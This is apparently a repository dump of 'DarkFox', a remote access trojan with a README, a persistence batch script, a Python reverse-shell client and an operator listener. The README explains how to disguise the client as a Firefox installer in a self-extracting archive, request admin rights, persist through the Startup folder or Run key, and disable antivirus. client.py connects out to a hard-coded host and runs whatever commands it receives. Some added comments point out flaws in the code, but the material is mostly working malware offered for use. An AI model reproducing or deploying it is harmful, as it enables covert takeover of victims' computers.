├── Firefox Installer.exe
├── Firefox.ico
├── README.md
├── README.txt
├── antivirus.bat
├── antivirus.exe
├── client.py
└── server.py

/Firefox Installer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/Firefox Installer.exe
--------------------------------------------------------------------------------

/Firefox.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/Firefox.ico
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# DarkFox

Remote access trojan built with WinRAR: a self-extracting archive that bundles a benign installer (e.g. Firefox) together with a Python reverse shell.

- Edit client.py and set the IP and port of the attacker's listening server, plus the IP and port of any proxy present on the attacking machine. If there is no proxy, comment out that section.

- Turn client.py into an .exe; I used PyInstaller: pyinstaller -w -i "Firefox.ico" -F client.py. The -w option produces a windowless .exe, the -F option produces a single file.

- Create a self-extracting archive with WinRAR, selecting three files: a benign installer (e.g. "firefox installer.exe"), client.exe and antivirus.exe.
In the settings of the self-extracting module, set the execution order so that the benign installer runs first and client.exe second; tick the checkbox to extract the files into a temporary folder, or, if you want persistence, set the extraction folder to the folder whose contents are launched at startup (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup).
In the settings of the self-extracting module, also select "request administrative rights".
antivirus.exe is a windowless .exe intended to disable the antivirus, and this README says client.exe launches it before connecting to the server. Note that in the client.py shipped here the subprocess.call("antivirus.exe") line is commented out, and antivirus.bat only carries a commented-out placeholder for the AV-stop command; its live code is the registry Run-key persistence described below.

- antivirus.bat contains the source of the .exe of the same name plus one further optional feature.
I used "Slimm bat to exe.exe" to convert the .bat file into a windowless .exe.

Enjoy :)

--------------------------------------------------------------------------------

/README.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/README.txt
--------------------------------------------------------------------------------

/antivirus.bat:
--------------------------------------------------------------------------------
:: Shut down the antivirus. Placeholder only: both lines below are commented
:: out, so nothing is stopped unless a real path and stop command are filled in.
::cd "C:\Program Files (x86)\AntivirusXXX\AntivirusXXX"
::XXX.exe -stop


:: If the Startup folder was not chosen as the extraction folder in the
:: self-extracting module settings, client.exe can still be launched at startup
:: simply by adding a value under the registry Run key.
:: C:\bin\client.exe is the path the client was extracted to in this example.
:: The value name "Installware" and that path are the persistence indicators
:: this leaves behind. HKLM is machine-wide, so writing it needs the elevation
:: the README's "request administrative rights" SFX option asks for.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Installware
if %errorlevel% NEQ 0 (
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Installware /d C:\bin\client.exe
)
--------------------------------------------------------------------------------

/antivirus.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/antivirus.exe
--------------------------------------------------------------------------------

/client.py:
--------------------------------------------------------------------------------
# Reverse-shell client: runs on the victim PC, connects out to the listener in
# server.py and executes whatever it receives through the system shell.
# Everything travels over a single cleartext TCP connection with no
# authentication, so the commands and their output are readable on the wire.
import socket
import os
import subprocess
import socks

# IP and port of the listening server (hard-coded at build time).
target_host = "192.168.56.1"
target_port = 443
# These flags and the `for n in range(...)` loops around each step do no real
# work; the author uses them only to pad/obfuscate the code. Each loop body
# runs at most once, because the flag is set (or `break` is hit) on the first
# pass.
socketON = 0
connectON = 0
closeON = 0

# Launch of the AV-disabling helper. It is commented out here, so despite the
# README this build does not run antivirus.exe before connecting.
#subprocess.call("antivirus.exe") #we launch the exe file that shut down the antivirus.

for n in range(100):
    if socketON == 0:
        client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # Plain TCP socket; this is the active variant (no proxy).
        #client = socks.socksocket(socket.AF_INET,socket.SOCK_STREAM) # Alternative: a PySocks socket for going out through a proxy.
        #client.set_proxy(socks.HTTP, "localhost", 3128)

        print("Socket created")
        socketON = 1

for n in range(100):
    if connectON == 0:
        # One blocking connect; an unreachable or refused listener raises here
        # and the process exits. There is no retry.
        client.connect((target_host,target_port))
        print("Connection established")
        connectON = 1
# Command loop. Each pass does a single recv of at most 1024 bytes, so a
# longer command is split over several iterations. `cd` is handled with
# os.chdir because a `cd` run in the child shell would not affect this
# process; the same data then also falls through to the `len(data) > 0`
# branch and is run through the shell as well.
# NOTE(review): `data[3:]` assumes the form "cd <dir>"; a bare "cd" yields
# os.chdir("") which raises and nothing catches it. If the peer closes the
# connection, recv returns "" and this loop keeps spinning on empty reads.
# Only stdout is read back; stderr is piped but never read, so error output
# never reaches the operator. The output is decoded as ISO-8859-1 and then
# re-encoded as UTF-8, so non-ASCII bytes arrive transformed. The reply is the
# output followed by the current working directory and a '$' prompt.
while True:
    for n in range(1000):
        data = client.recv(1024).decode("utf-8")
        break
    if data[:2] == 'cd':
        for n in range(1000):
            os.chdir(data[3:])
            break
    if len(data) > 0:
        for n in range(1000):
            cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE )
            output_bytes = cmd.stdout.read()
            output_str = str(output_bytes, "ISO-8859-1")
            client.send(str.encode(output_str + str(os.getcwd()) + '$'))
            break
        #print(output_str)

# Unreachable: the `while True` above never breaks, so the socket is only
# released when the process dies.
for n in range(100):
    if closeON == 0:
        client.close()
        closeON = 1
        break
--------------------------------------------------------------------------------

/server.py:
--------------------------------------------------------------------------------
# Listener / operator side: runs on the attacker PC, accepts a single client
# and relays commands typed on stdin to it.
import socket
import threading
import os
import sys


#we are defining a function send_commands this takes in a socket object.
# If the user types "quit", the connection and the listening socket are closed
# and the process exits. Otherwise the command is encoded and sent with
# conn.send, the reply is received, decoded as UTF-8 and printed.
#
# NOTE(review): there is no authentication or encryption on this channel, so
# whichever peer reaches the listener first becomes the "client" and receives
# the operator's commands in cleartext.
def send_commands(conn: socket.socket) -> None:
    """Interactive operator loop: read a line from stdin, send it over `conn`,
    print the reply. On "quit" also closes the module-level `server` socket."""
    while True:
        print("enter the commands below\n")
        cmd = input()
        if cmd == 'quit':
            conn.close()
            server.close()
            sys.exit()
        if len(str.encode(cmd)) > 0:
            conn.send(str.encode(cmd))
            # Reads at most 4096 bytes (4 KiB, not 4 MB). A longer reply is not
            # lost: the remainder stays buffered and comes back on the next
            # recv, so replies drift out of step with the commands that
            # produced them.
            client_response = str(conn.recv(4096), "utf-8")
            print(client_response, end="\n")

# Listener address. '' binds every interface, so the listener is reachable
# from any network the attacker machine is on. Port 443 is presumably chosen
# to look like HTTPS, but the traffic is plain TCP.
bind_ip = ''
bind_port = 443
serv_add = (bind_ip , bind_port)

# TCP listener. listen(5) is the accept backlog (queued connections), not a
# delay. `threading` and `os` are imported above but never used in this file.

server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((serv_add))
server.listen(5)

print ("[*] listening on {}:{}".format(bind_ip,bind_port))

# Exactly one accept: the first peer to connect gets the operator session.
# addr[0] is its IP and addr[1] its source port.
conn,addr = server.accept()

print('accepted connection from {} and port {}'.format(addr[0],addr[1]))

send_commands(conn)

conn.close()